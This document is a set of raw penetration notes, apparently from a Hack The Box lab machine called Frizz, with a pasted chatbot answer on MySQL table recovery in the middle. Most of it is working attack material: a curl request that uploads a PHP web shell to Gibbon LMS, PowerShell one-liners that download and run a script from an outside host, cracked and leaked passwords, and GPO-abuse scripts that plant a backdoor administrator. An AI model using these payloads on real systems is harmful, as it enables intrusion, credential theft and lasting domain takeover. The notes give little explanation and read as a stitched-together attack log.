10.129.187.152 http://frizzdc.frizz.htb
Enumeration
sudo nmap -sC -sV -oA 10.129.187.152 10.129.187.152 -PnPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-16 02:06:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
fiona
fiona.frizzle
wanda
ross
ross.parker
ralphie
http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
./automation.sh
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.93/sharp.ps1%27)%22
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
That makes sense! Based on what worked for you, here’s a revised, precise step-by-step guide to follow in the future when restoring MySQL tables using .sql, .frm, and .ibd files.
MySQL Table Recovery from .frm, .ibd, and .sql Dump
Scenario:
- You have a MySQL dump (
gibbon.sql) and additional.frmand.ibdfiles. - You need to import the database and restore a missing table (e.g.,
gibbonPerson).
Step 1: Create and Import the Database from SQL Dump
-
Open MySQL:
sudo mysql -
Create the database:
CREATE DATABASE gibbon_recovered;
exit;-
Import the
.sqldump:sudo mysql gibbon_recovered < gibbon.sql -
Verify tables are imported:
sudo mysql -e "USE gibbon_recovered; SHOW TABLES;"
Step 2: Copy Missing Table’s .frm & .ibd Files
-
Copy
.frmand.ibdfiles to the MySQL data directory:sudo cp gibbonperson.frm /var/lib/mysql/gibbon_recovered/ sudo cp gibbonperson.ibd /var/lib/mysql/gibbon_recovered/ -
Fix file ownership:
sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonperson.* sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonperson.ibd sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonperson.frm
Step 3: Rename Files If Case Sensitivity Causes Issues
-
Check existing tables in MySQL:
sudo mysql -e "USE gibbon_recovered; SHOW TABLES;" -
If MySQL expects
gibbonPersonbut files are namedgibbonperson, rename them:sudo mv /var/lib/mysql/gibbon_recovered/gibbonperson.frm /var/lib/mysql/gibbon_recovered/gibbonPerson.frm sudo mv /var/lib/mysql/gibbon_recovered/gibbonperson.ibd /var/lib/mysql/gibbon_recovered/gibbonPerson.ibd -
Fix ownership:
sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonPerson.* sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonPerson.ibd sudo chown mysql:mysql /var/lib/mysql/gibbon_recovered/gibbonPerson.frm
Step 4: Restart MySQL & Verify the Table
-
Restart MySQL to apply changes:
sudo systemctl restart mysql -
Open MySQL and check the table:
sudo mysqlUSE gibbon_recovered; ALTER TABLE gibbonPerson DISCARD TABLESPACE; ALTER TABLE gibbonPerson IMPORT TABLESPACE; SELECT * FROM gibbonPerson LIMIT 10;
hashcat -m 1420 -O hash.txt /usr/share/seclists/rockyou.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
f.frizzle@frizz.htb
Jenni_Luvs_Magic23
getTGT.py -dc-ip 10.129.187.152 frizz.htb/f.frizzle
make-token -d frizz.htb -u f.frizzle -p Jenni_Luvs_Magic23 -T LOGON_NETWORK
execute -o cmd /c "powershell IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.93/sharp.ps1')"
kinit f.frizzle@frizz.htb
kvno HOST/frizzdc
kvno CIFS/frizzdc
ssh -K f.frizzle@frizz.htb@frizzdc.frizz.htb
Accessed Modified Path
2024-10-29 2024-10-29 C:\Users\All Users\ssh\ssh_host_rsa_key 2024-10-29 2024-10-29 C:\Users\All Users\ssh\ssh_host_rsa_key.pub
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:/C:/Users/f.frizzle/test.7z ~/Downloads/
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
netexec smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k
!suBcig@MehTed!R
M.SchoolBus
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.93/sharp.ps1')"
PS C:\Users\Administrator> $GPOName = "Add Local Admin"
PS C:\Users\Administrator> New-GPO -Name $GPOName -Comment "Creates a local admin via GPO Preferences"
DisplayName : Add Local Admin
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 8c481779-aae2-43ba-bf74-1e81b5754d86
GpoStatus : AllSettingsEnabled
Description : Creates a local admin via GPO Preferences
CreationTime : 3/16/2025 3:43:04 AM
ModificationTime : 3/16/2025 3:43:04 AM
UserVersion :
ComputerVersion :
WmiFilter :
# Define Variables
$DomainName = "frizz.htb" # Manually set domain
$GPOName = "Emergency_Local_Access"
$UserName = "BackdoorAdmin"
$Password = "SuperSecurePass123"
# Create the GPO
$NewGPO = New-GPO -Name $GPOName -Comment "Creates an emergency local admin via GPO Preferences"
# Extract GPO ID
$GPO_ID = $NewGPO.Id
Write-Host "[+] Extracted GPO ID: $GPO_ID"
# Define SYSVOL Path
$GPOPath = "\\$DomainName\SYSVOL\$DomainName\Policies\{$GPO_ID}\Machine\Preferences\Groups"
# Create Directory
Write-Host "[+] Creating directory: $GPOPath"
New-Item -ItemType Directory -Path $GPOPath -Force | Out-Null
# Encrypt Password
$EncryptedPass = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Password))
# Create XML for User
$UserXML = @"
<Groups clsid="{3125E3B7-5830-47C8-9271-FD5A85046B29}">
<User name="$UserName" action="C" description="Emergency Local Admin">
<Properties description="Emergency Local Admin User"
fullName="ITSupport"
userName="$UserName"
action="U"
cpassword="$EncryptedPass"
noChange="0"
neverExpires="1"
acctDisabled="0"
userFlags="512"/>
<Filters/>
</User>
<Group name="Administrators (built-in)" action="U">
<Properties groupName="Administrators (built-in)"
action="U"
newName=""
deleteAllUsers="0"/>
<Members>
<Member name="$UserName" action="ADD" sid="S-1-5-32-544"/>
</Members>
</Group>
</Groups>
"@
# Write to SYSVOL
Set-Content -Path "$GPOPath\groups.xml" -Value $UserXML -Encoding UTF8
Write-Host "[+] User '$UserName' added to GPO '$GPOName' in SYSVOL!"
# Force replication
repadmin /syncall /AdeP
gpupdate /force
Write-Host "[+] Successfully created GPO '$GPOName' and applied policy!"
python3 pygpoabuse.py 'frizz.htb/M.Schoolbus' -p '!suBcig@MehTed!R' -gpo-id "6ACCD7CA-C2A9-4212-8DDE-2ED58DF7610B" -f
New-GPO -Name "AbusedGPO"
New-GPLink -Name "AbusedGPO" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
.\SharpGPOAbuse.exe --AddUserTask --GPOName "AbusedGPO" --TaskName "BackdoorTask" --Author "FRIZZ.HTB\M.SchoolBus" --Command "cmd.exe" --Arguments "/c net localgroup administrators M.SchoolBus /add"
.\SharpGPOAbuse.exe --AddLocalAdmin --GPOName "AbusedGPO" --UserAccount "M.SchoolBus"